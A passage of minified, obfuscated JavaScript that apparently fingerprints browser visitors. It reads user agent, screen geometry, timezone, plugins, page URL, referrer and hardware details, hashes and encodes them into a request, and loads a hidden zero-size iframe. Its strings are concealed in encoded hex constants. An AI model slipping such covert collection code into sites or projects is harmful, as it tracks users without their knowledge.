td_G;};td_2V.td_0m=function(td_Z){if(td_Z===null||td_Z.length===null){return null;}var td_X="";try{var td_r="";for(var td_q=0;td_q<td_Z.length;++td_q){var td_H=String.fromCharCode(65+td_q);if(td_H!==[][[]]+""){td_r+=td_H; }}var td_l=td_2V.td_3P(td_r,td_Z);var td_b=td_l.match(/.{1,3}/g);for(td_q=0;td_q<td_b.length;++td_q){td_X+=String.fromCharCode(parseInt(td_b[td_q],10));}}catch(td_j){return null;}return td_X;};td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca=new td_2V.td_1r("\x30\x64\x34\x66\x62\x64\x38\x30\x30\x31\x39\x61\x34\x62\x37\x65\x61\x39\x62\x62\x33\x36\x34\x37\x64\x36\x39\x33\x36\x61\x63\x61\x31\x36\x30\x65\x35\x36\x35\x62\x30\x65\x31\x35\x30\x35\x31\x36\x35\x61\x35\x30\x30\x34\x34\x37\x35\x32\x35\x66\x31\x31\x30\x34\x30\x37\x30\x34\x34\x34\x31\x31\x34\x62\x34\x66\x30\x39\x31\x31\x30\x39\x34\x32\x30\x34\x31\x35\x35\x62\x30\x66\x35\x65\x34\x37\x34\x37\x35\x39\x31\x32\x30\x35\x35\x66\x34\x32\x34\x32\x30\x64\x31\x36\x34\x32\x35\x61\x30\x35\x30\x39\x34\x34\x35\x62\x30\x64\x35\x63\x34\x61\x31\x36\x31\x30\x35\x61\x35\x38\x35\x33\x31\x31\x30\x30\x34\x34\x30\x34\x31\x35\x34\x36\x35\x63\x34\x35\x31\x31\x35\x63\x35\x39\x31\x32\x31\x36\x30\x61\x35\x39\x31\x65\x35\x38\x35\x38\x30\x63\x34\x63\x30\x66\x35\x66\x30\x63\x35\x38\x31\x32\x30\x66\x31\x66\x30\x38\x31\x31\x35\x63\x30\x62\x31\x32\x35\x64\x31\x37\x35\x34\x30\x34\x31\x35\x35\x63\x31\x32\x30\x63\x31\x34\x30\x64\x34\x32\x35\x65\x31\x35\x30\x30\x31\x31\x30\x35\x31\x36\x35\x61\x34\x32\x35\x34\x31\x34\x30\x39\x31\x36\x34\x35\x31\x30\x30\x34\x35\x37\x31\x37\x30\x66\x35\x31\x35\x33\x34\x36\x31\x31\x30\x61\x35\x65\x35\x61\x30\x65\x31\x30\x30\x66\x30\x37\x30\x63\x30\x64\x34\x32\x34\x30\x31\x63\x30\x36\x35\x39\x31\x65\x35\x35\x34\x38\x30\x32\x30\x34\x34\x37\x35\x33\x30\x65\x36\x38\x30\x36\x35\x63\x31\x66\x30\x35\x30\x65\x36\x63\x35\x65\x30\x39\x31\x31\x30\x37\x35\x35\x35\x64\x30\x65"); var td_2V=td_2V||{};var td_AZ=255;function td_3X(){td_3h=new td_Sz(td_0Q.td_0O);td_2h=new td_f9(td_0Q.td_3L);td_3M=new td_FQ(td_0Q.td_3p);var td_G2="";try{td_G2+=td_Wq();}catch(td_PL){}try{td_G2+=td_BA(); }catch(td_PL){}var td_mt=navigator.userAgent?td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(0,4)+td_2V.td_2u(td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(4,3)+encodeURIComponent(navigator.userAgent),td_2m):""; var td_RV=td_3Y+td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(7,4)+td_2V.td_2u(td_G2,td_2m)+td_mt;if(typeof td_2N!==[][[]]+""){var td_mF=function(){setTimeout(function(){td_2N(td_2m);},2000);};}td_0K(td_RV,document,td_mF); }function td_BO(){try{var td_Yx=1;if(window&&window.devicePixelRatio){td_Yx=window.devicePixelRatio;}var td_Up=0;var td_FU=0;var td_tX=0;var td_vr=0;if(screen&&screen.width&&screen.height){td_Up=screen.width*td_Yx; td_FU=screen.height*td_Yx;}else{if(window&&window.screen.width&&window.screen.height){td_Up=window.screen.width*td_Yx;td_FU=window.screen.height*td_Yx;}}var td_YM=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(11,3)+td_Up+"x"+td_FU; if(window&&window.screen&&window.screen.availWidth&&window.screen.availHeight){td_tX=window.screen.availWidth*td_Yx;td_vr=window.screen.availHeight*td_Yx;}if(td_tX!==0&&td_vr!==0){td_YM+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(14,4)+td_tX+"x"+td_vr; }if(typeof window!==[][[]]+""&&typeof window.screenX!==[][[]]+""&&typeof window.screenY!==[][[]]+""){var td_jS=window.screenX*td_Yx;var td_XX=window.screenY*td_Yx;td_YM+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(18,5)+td_jS+"x"+td_XX; }return td_YM;}catch(td_bz){}return"";}function td_Wq(){var td_P3=new Date();td_P3.setDate(1);td_P3.setMonth(5);var td_h8=-td_P3.getTimezoneOffset();td_P3.setMonth(11);var td_Ih=-td_P3.getTimezoneOffset(); var td_xD=Math.min(td_h8,td_Ih);var td_Do=Math.max(td_h8,td_Ih)-td_xD;var td_bW=td_LQ?td_LQ.length:0;var td_va=[];for(var td_ba=0;td_ba<td_bW;td_ba++){td_va[td_ba]=td_LQ[td_ba].type;}var td_D4=td_bW>0?td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(23,4)+td_0h(td_va.join())+td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(27,4)+td_bW:""; var td_kt="";if(td_3x!==null){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(31,3)+td_3x;}td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(34,3)+td_xD+td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(37,3)+td_Do+td_BO()+td_D4; td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(40,5)+screen.colorDepth;td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(45,4)+encodeURIComponent(location.href.substring(0,td_AZ));var td_Bj=encodeURIComponent(document.referrer.substring(0,td_AZ)); if(typeof td_2z===td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(49,6)&&td_2z.length>0&&window!==window.top&&td_Bj.length===0){td_Bj=td_2z;}td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(55,4)+td_Bj; var td_H5=td_K6();if(td_H5!==null){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(59,3)+td_H5;}var td_fB=navigator.plugins;if(td_fB.length){var td_A8=td_fB.length;td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(62,4)+td_A8; var td_Bp;for(td_ba=0;td_ba<td_A8;td_ba++){td_Bp+=td_fB[td_ba].name+td_fB[td_ba].description+td_fB[td_ba].filename+td_fB[td_ba].length;}td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(66,4)+td_0h(td_Bp); }td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(70,4)+td_0h(td_0J+td_2m);if(td_0Q.td_1l!==td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(74,7)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(81,5)+encodeURIComponent(td_0Q.td_1l); }if(td_0Q.td_3L!==td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(74,7)){if(td_0Q.td_3p!==td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(74,7)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(86,5)+encodeURIComponent(td_0Q.td_3L+" "+td_0Q.td_3p); }else{td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(86,5)+encodeURIComponent(td_0Q.td_3L);}}if(td_0Q.td_0C!==td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(74,7)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(91,6)+encodeURIComponent(td_0Q.td_0C); }if(td_0Q.td_0R!==td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(74,7)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(97,6)+encodeURIComponent(td_0Q.td_0R);}if(td_0Q.td_3g===true){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(103,10); }if(typeof navigator!==[][[]]+""){if(typeof navigator.hardwareConcurrency===td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(113,6)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(119,5)+navigator.hardwareConcurrency; }if(typeof navigator.deviceMemory===td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(113,6)){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(124,5)+navigator.deviceMemory;}}if(typeof Intl!==[][[]]+""&&typeof Intl.DateTimeFormat!==[][[]]+""){var td_ma=Intl.DateTimeFormat(); if(td_ma!==null&&typeof td_ma!==[][[]]+""&&typeof td_ma.resolvedOptions!==[][[]]+""){var td_Ds=td_ma.resolvedOptions();if(td_Ds!==null&&typeof td_Ds.timeZone===td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(49,6)&&td_Ds.timeZone.length>0){td_kt+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(129,5)+encodeURIComponent(td_Ds.timeZone); }}}td_1T(td_0X,document);return td_kt;}function td_BA(){var td_nD="";if(typeof td_1t!==[][[]]+""){var td_AB=td_1t();if(td_AB){td_nD+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(134,5)+td_AB;}}if(typeof td_2F!==[][[]]+""){var td_iv=td_2F(); if(td_iv){td_nD+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(139,6)+encodeURIComponent(td_iv)+td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(145,6)+td_3H(td_iv);}}if(typeof td_1a!==[][[]]+""){var td_mJ=td_1a(); if(td_mJ){td_nD+=td_mJ;}}if(typeof td_3E!==[][[]]+""){td_3E();}if(typeof td_0y!==[][[]]+""){td_0y();}else{if(typeof td_0H!==[][[]]+""){td_0H();}}if(typeof td_2q!==[][[]]+""){td_2q();}else{if(typeof td_3k!==[][[]]+""){td_3k(); }}if(typeof td_2C!==[][[]]+""){td_2C();}if(typeof td_1H!==[][[]]+""){td_1H();}if(typeof td_2A!==[][[]]+""){if(typeof td_2E!==[][[]]+""){td_2A.addFeature(new td_2E());}if(typeof td_1M!==[][[]]+""){td_2A.addFeature(new td_1M()); }}if(typeof td_0M!==[][[]]+""){td_0M(td_0F,td_1V,td_2r);}if(typeof td_1b!==[][[]]+""){td_1b(td_2e,td_3D,td_0j);}if(typeof td_1o!==[][[]]+""){td_1o();}if(typeof td_2i!==[][[]]+""){td_2i();}if(typeof td_2B!==[][[]]+""){var td_X9=td_2B(); if(td_X9!==null){td_nD+=td_X9;}}td_1T(td_0X,document);if(typeof td_1p!==[][[]]+""){td_1p();}if(td_1q.length>0){var td_nk=new td_0I(td_0Q.td_0O,td_0Q.td_3L,td_1q);if(td_nk.isValid()){td_nk.scan();}}td_2V.load_iframe(td_2Q,td_2R,document); if(typeof td_2G!==[][[]]+""){td_2G();}if(typeof td_2V.td_0b!==[][[]]+""){td_2V.td_0b();}if(typeof td_1I!==[][[]]+""){var td_g7=td_1I();if(td_g7){td_nD+=td_2V.tdz_0d4fbd80019a4b7ea9bb3647d6936aca.td_f(151,5)+td_g7; }}return td_nD;}td_2V.tdz_605867e5358c4b8794826675e8a8a1a7=new td_2V.td_1r("\x36\x30\x35\x38\x36\x37\x65\x35\x33\x35\x38\x63\x34\x62\x38\x37\x39\x34\x38\x32\x36\x36\x37\x35\x65\x38\x61\x38\x61\x31\x61\x37\x30\x36\x30\x31\x30\x37\x30\x62\x30\x32\x30\x32\x35\x33\x30\x32\x30\x62\x30\x63\x35\x39\x30\x31\x35\x37\x30\x36\x35\x64\x35\x31"); var td_0h=function(td_ik){function td_pE(td_RJ){return td_MK(td_aL(td_V2(td_RJ),td_RJ.length*8));}function td_Rs(td_gi){var td_oW=td_2V.tdz_605867e5358c4b8794826675e8a8a1a7.td_f(0,16);var td_WC="";var td_Wv; for(var td_Td=0;td_Td<td_gi.length;td_Td++){td_Wv=td_gi.charCodeAt(td_Td);td_WC+=td_oW.charAt((td_Wv>>>4)&15)+td_oW.charAt(td_Wv&15);}return td_WC;}function td_U9(td_Rg){var td_WY="";var td_KZ=-1;var td_Qu,td_eR; while(++td_KZ<td_Rg.length){td_Qu=td_Rg.charCodeAt(td_KZ);td_eR=td_KZ+1<td_Rg.length?td_Rg.charCodeAt(td_KZ+1):0;if(55296<=td_Qu&&td_Qu<=56319&&56320<=td_eR&&td_eR<=57343){td_Qu=65536+((td_Qu&1023)<<10)+(td_eR&1023); td_KZ++;}if(td_Qu<=127){td_WY+=String.fromCharCode(td_Qu);}else{if(td_Qu<=2047){td_WY+=String.fromCharCode(192|((td_Qu>>>6)&31),128|(td_Qu&63));}else{if(td_Qu<=65535){td_WY+=String.fromCharCode(224|((td_Qu>>>12)&15),128|((td_Qu>>>6)&63),128|(td_Qu&63)); }else{if(td_Qu<=2097151){td_WY+=String.fromCharCode(240|((td_Qu>>>18)&7),128|((td_Qu>>>12)&63),128|((td_Qu>>>6)&63),128|(td_Qu&63));}}}}}return td_WY;}function td_V2(td_G7){var td_qp=Array(td_G7.length>>2); for(var td_C6=0;td_C6<td_qp.length;td_C6++){td_qp[td_C6]=0;}for(td_C6=0;td_C6<td_G7.length*8;td_C6+=8){td_qp[td_C6>>5]|=(td_G7.charCodeAt(td_C6/8)&255)<<(td_C6%32);}return td_qp;}function td_MK(td_w6){var td_Ox=""; for(var td_eT=0;td_eT<td_w6.length*32;td_eT+=8){td_Ox+=String.fromCharCode((td_w6[td_eT>>5]>>>(td_eT%32))&255);}return td_Ox;}function td_aL(td_Op,td_TB){td_Op[td_TB>>5]|=128<<((td_TB)%32);td_Op[(((td_TB+64)>>>9)<<4)+14]=td_TB; var td_K6=1732584193;var td_xZ=-271733879;var td_ra=-1732584194;var td_QK=271733878;for(var td_qJ=0;td_qJ<td_Op.length;td_qJ+=16){var td_B2=td_K6;var td_wG=td_xZ;var td_ts=td_ra;var td_FP=td_QK;td_K6=td_Ny(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+0],7,-680876936); td_QK=td_Ny(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+1],12,-389564586);td_ra=td_Ny(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+2],17,606105819);td_xZ=td_Ny(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+3],22,-1044525330);td_K6=td_Ny(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+4],7,-176418897); td_QK=td_Ny(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+5],12,1200080426);td_ra=td_Ny(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+6],17,-1473231341);td_xZ=td_Ny(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+7],22,-45705983);td_K6=td_Ny(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+8],7,1770035416); td_QK=td_Ny(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+9],12,-1958414417);td_ra=td_Ny(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+10],17,-42063);td_xZ=td_Ny(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+11],22,-1990404162);td_K6=td_Ny(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+12],7,1804603682); td_QK=td_Ny(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+13],12,-40341101);td_ra=td_Ny(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+14],17,-1502002290);td_xZ=td_Ny(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+15],22,1236535329); td_K6=td_CG(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+1],5,-165796510);td_QK=td_CG(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+6],9,-1069501632);td_ra=td_CG(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+11],14,643717713);td_xZ=td_CG(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+0],20,-373897302); td_K6=td_CG(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+5],5,-701558691);td_QK=td_CG(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+10],9,38016083);td_ra=td_CG(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+15],14,-660478335);td_xZ=td_CG(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+4],20,-405537848); td_K6=td_CG(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+9],5,568446438);td_QK=td_CG(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+14],9,-1019803690);td_ra=td_CG(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+3],14,-187363961);td_xZ=td_CG(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+8],20,1163531501); td_K6=td_CG(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+13],5,-1444681467);td_QK=td_CG(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+2],9,-51403784);td_ra=td_CG(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+7],14,1735328473);td_xZ=td_CG(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+12],20,-1926607734); td_K6=td_d9(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+5],4,-378558);td_QK=td_d9(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+8],11,-2022574463);td_ra=td_d9(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+11],16,1839030562);td_xZ=td_d9(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+14],23,-35309556); td_K6=td_d9(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+1],4,-1530992060);td_QK=td_d9(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+4],11,1272893353);td_ra=td_d9(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+7],16,-155497632);td_xZ=td_d9(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+10],23,-1094730640); td_K6=td_d9(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+13],4,681279174);td_QK=td_d9(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+0],11,-358537222);td_ra=td_d9(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+3],16,-722521979);td_xZ=td_d9(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+6],23,76029189); td_K6=td_d9(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+9],4,-640364487);td_QK=td_d9(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+12],11,-421815835);td_ra=td_d9(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+15],16,530742520);td_xZ=td_d9(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+2],23,-995338651); td_K6=td_y1(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+0],6,-198630844);td_QK=td_y1(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+7],10,1126891415);td_ra=td_y1(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+14],15,-1416354905);td_xZ=td_y1(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+5],21,-57434055); td_K6=td_y1(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+12],6,1700485571);td_QK=td_y1(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+3],10,-1894986606);td_ra=td_y1(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+10],15,-1051523);td_xZ=td_y1(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+1],21,-2054922799); td_K6=td_y1(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+8],6,1873313359);td_QK=td_y1(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+15],10,-30611744);td_ra=td_y1(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+6],15,-1560198380);td_xZ=td_y1(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+13],21,1309151649); td_K6=td_y1(td_K6,td_xZ,td_ra,td_QK,td_Op[td_qJ+4],6,-145523070);td_QK=td_y1(td_QK,td_K6,td_xZ,td_ra,td_Op[td_qJ+11],10,-1120210379);td_ra=td_y1(td_ra,td_QK,td_K6,td_xZ,td_Op[td_qJ+2],15,718787259);td_xZ=td_y1(td_xZ,td_ra,td_QK,td_K6,td_Op[td_qJ+9],21,-343485551); td_K6=td_z5(td_K6,td_B2);td_xZ=td_z5(td_xZ,td_wG);td_ra=td_z5(td_ra,td_ts);td_QK=td_z5(td_QK,td_FP);}return Array(td_K6,td_xZ,td_ra,td_QK);}function td_C4(td_jS,td_Tw,td_d6,td_Dj,td_sk,td_uR){return td_z5(td_tA(td_z5(td_z5(td_Tw,td_jS),td_z5(td_Dj,td_uR)),td_sk),td_d6); }function td_Ny(td_fZ,td_m2,td_UO,td_RV,td_ch,td_Eo,td_Ce){return td_C4((td_m2&td_UO)|((~td_m2)&td_RV),td_fZ,td_m2,td_ch,td_Eo,td_Ce);}function td_CG(td_AO,td_sW,td_ak,td_tb,td_GS,td_rQ,td_oa){return td_C4((td_sW&td_tb)|(td_ak&(~td_tb)),td_AO,td_sW,td_GS,td_rQ,td_oa); }function td_d9(td_bu,td_pY,td_jl,td_DS,td_Mj,td_MZ,td_Y4){return td_C4(td_pY^td_jl^td_DS,td_bu,td_pY,td_Mj,td_MZ,td_Y4);}function td_y1(td_gm,td_Gp,td_lA,td_Op,td_yg,td_MO,td_pU){return td_C4(td_lA^(td_Gp|(~td_Op)),td_gm,td_Gp,td_yg,td_MO,td_pU); }function td_z5(td_rJ,td_ow){var td_xd=(td_rJ&65535)+(td_ow&65535);var td_x4=(td_rJ>>16)+(td_ow>>16)+(td_xd>>16);return((td_x4<<16)|(td_xd&65535));}function td_tA(td_iV,td_OJ){return((td_iV<<td_OJ)|(td_iV>>>(32-td_OJ))); }return td_Rs(td_pE(td_U9(td_ik)));};var td_2V=td_2V||{};td_2V.td_3a=function(){};td_2V.hasDebug=false;td_2V.trace=function(){};td_2V.hasTrace=false;td_2V.tdz_553ef4b4df274fd38385133672aedf2b=new td_2V.td_1r("\x35\x35\x33\x65\x66\x34\x62\x34\x64\x66\x32\x37\x34\x66\x64\x33\x38\x33\x38\x35\x31\x33\x33\x36\x37\x32\x61\x65\x64\x66\x32\x62\x30\x35\x30\x34\x30\x31\x35\x36\x35\x32\x30\x31\x35\x34\x30\x33\x35\x63\x35\x66\x35\x33\x35\x35\x35\x37\x30\x32\x30\x31\x35\x35\x35\x64\x35\x64\x37\x31\x37\x33\x36\x33\x37\x32\x37\x65\x37\x33\x35\x65\x35\x34\x31\x33\x30\x34\x30\x39\x30\x33\x35\x37\x30\x66\x34\x35\x34\x31\x34\x61\x30\x34\x31\x34\x35\x64\x30\x33\x31\x39\x30\x30\x30\x66\x34\x31\x35\x36\x35\x36\x30\x61\x30\x31\x35\x37\x35\x39\x34\x31\x35\x31\x35\x34\x31\x63\x35\x62\x35\x61\x35\x32\x35\x33\x35\x37\x30\x66\x31\x36\x30\x35\x30\x38\x35\x36\x30\x30\x35\x61\x34\x64\x34\x30\x31\x31\x31\x66\x35\x38\x30\x37\x35\x37\x30\x62\x30\x61\x35\x64\x34\x35\x30\x65\x31\x34\x30\x33\x35\x31\x35\x39\x31\x62\x30\x38\x31\x39\x30\x31\x31\x66\x30\x33\x31\x61\x30\x37\x31\x62\x35\x61\x34\x35\x30\x32\x30\x61\x35\x64\x30\x33\x34\x31\x30\x66\x35\x66\x30\x30\x30\x30\x34\x30\x35\x39\x31\x34\x31\x34\x30\x39\x34\x31\x35\x65\x34\x30\x30\x66\x30\x62\x35\x64\x30\x32\x35\x32\x35\x61\x34\x36\x35\x65\x35\x66\x34\x36\x34\x32\x35\x32\x30\x39\x34\x31\x31\x31\x30\x62\x31\x36\x30\x38\x34\x66\x30\x37\x30\x35\x30\x33\x35\x65\x34\x36\x35\x38\x30\x37\x35\x32\x31\x30\x35\x63\x31\x66\x30\x35\x30\x34\x35\x36\x35\x66\x31\x33\x35\x61\x35\x63\x34\x61\x35\x31\x35\x34\x34\x31\x30\x39\x30\x36\x34\x37\x34\x61\x31\x32\x31\x37\x30\x37\x30\x38\x35\x64\x30\x63\x35\x36\x35\x30"); var td_2V=td_2V||{};if(typeof td_2V.td_3d===[][[]]+""){td_2V.td_3d=[];}td_2V.td_2c=function(){for(var td_V=0;td_V<td_2V.td_3d.length;++td_V){td_2V.td_3d[td_V]();}};td_2V.td_2u=function(td_A,td_X){var td_u=td_A.length+"&"+td_A; var td_B="";var td_c=td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(0,16);for(var td_L=0,td_Y=0;td_L<td_u.length;td_L++){var td_r=td_u.charCodeAt(td_L)^td_X.charCodeAt(td_Y)&10;if(++td_Y===td_X.length){td_Y=0; }td_B+=td_c.charAt((td_r>>4)&15);td_B+=td_c.charAt(td_r&15);}return td_B;};td_2V.td_1y=function(){try{var td_i=window.top.document;var td_D=td_i.forms.length;return td_i;}catch(td_H){return document;}}; td_2V.td_3l=function(td_l){try{var td_D;if(typeof td_l===[][[]]+""){td_D=window;}else{if(td_l==="t"){td_D=window.top;}else{if(td_l==="p"){td_D=window.parent;}else{td_D=window;}}}var td_t=td_D.document.forms.length; return td_D;}catch(td_S){return window;}};td_2V.add_lang_attr_html_tag=function(td_H){try{if(td_H===null){return;}var td_r=td_H.getElementsByTagName(Number(485781).toString(30));if(td_r!==null&&td_r.length>0&&td_r[0]!==[][[]]+""){td_r[0].setAttribute(Number(296632).toString(24),td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(16,2)); }}catch(td_c){}};td_2V.load_iframe=function(td_F,td_K,td_O){var td_c=td_3U(5);if(typeof(td_0u)!==[][[]]+""){td_0u(td_c,td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(18,6));}var td_V=td_O.createElement(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(24,6)); td_V.id=td_c;td_V.title=td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(30,5);td_V.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(35,13),Number(890830).toString(31));td_V.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(48,11),Number(890830).toString(31)); td_V.width="0";td_V.height="0";if(td_2R!==null){td_V.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(59,7),td_K);}td_V.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(66,5),td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(71,83)); td_V.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(154,3),td_F);td_O.body.appendChild(td_V);td_2V.add_lang_attr_html_tag(td_O);};td_2V.csp_nonce=null;td_2V.td_2g=function(td_Y){if(typeof td_Y.currentScript!==[][[]]+""&&td_Y.currentScript!==null){var td_e=td_Y.currentScript.getAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(157,5)); if(typeof td_e!==[][[]]+""&&td_e!==null&&td_e!==""){td_2V.csp_nonce=td_e;}else{if(typeof td_Y.currentScript.nonce!==[][[]]+""&&td_Y.currentScript.nonce!==null&&td_Y.currentScript.nonce!==""){td_2V.csp_nonce=td_Y.currentScript.nonce; }}}};td_2V.td_0t=function(td_y){if(td_2V.csp_nonce!==null){td_y.setAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(157,5),td_2V.csp_nonce);if(td_y.getAttribute(td_2V.tdz_553ef4b4df274fd38385133672aedf2b.td_f(157,5))!==td_2V.csp_nonce){td_y.nonce=td_2V.csp_nonce; }}};td_2V.tdz_7a91aafff59e4dc0b6032cc904041062=new td_2V.td_1r("\x37\x61\x39\x31\x61\x61\x66\x66\x66\x35\x39\x65\x34\x64\x63\x30\x62\x36\x30\x33\x32\x63\x63\x39\x30\x34\x30\x34\x31\x30\x36\x32\x35\x31\x31\x34\x35\x37\x35\x32\x31\x35\x30\x38\x30\x39\x30\x38\x31\x33\x35\x62\x35\x32\x30\x62\x35\x62\x31\x33\x30\x64\x35\x33\x30\x64\x35\x62\x34\x30\x35\x66\x35\x37\x31\x37\x30\x36\x35\x36\x35\x65\x35\x38\x35\x66\x35\x35\x35\x35"); function td_Z(td_p,td_R,td_t){if(typeof td_t===[][[]]+""||td_t===null){td_t=0;}else{if(td_t<0){td_t=Math.max(0,td_p.length+td_t);}}for(var td_V=td_t,td_o=td_p.length;td_V<td_o;td_V++){if(td_p[td_V]===td_R){return td_V; }}return -1;}function td_k(td_r,td_F,td_z){return td_r.indexOf(td_F,td_z);}function td_w(td_s){return td_s.replace(/^\s+|\s+$/g,"");}function td_q(td_p){return td_p.trim();}function td_3Z(td_W){return td_W.trim(); }function td_3v(td_G,td_v,td_F){return td_G.indexOf(td_v,td_F);}function td_E(){return Date.now();}function td_Q(){return new Date().getTime();}function 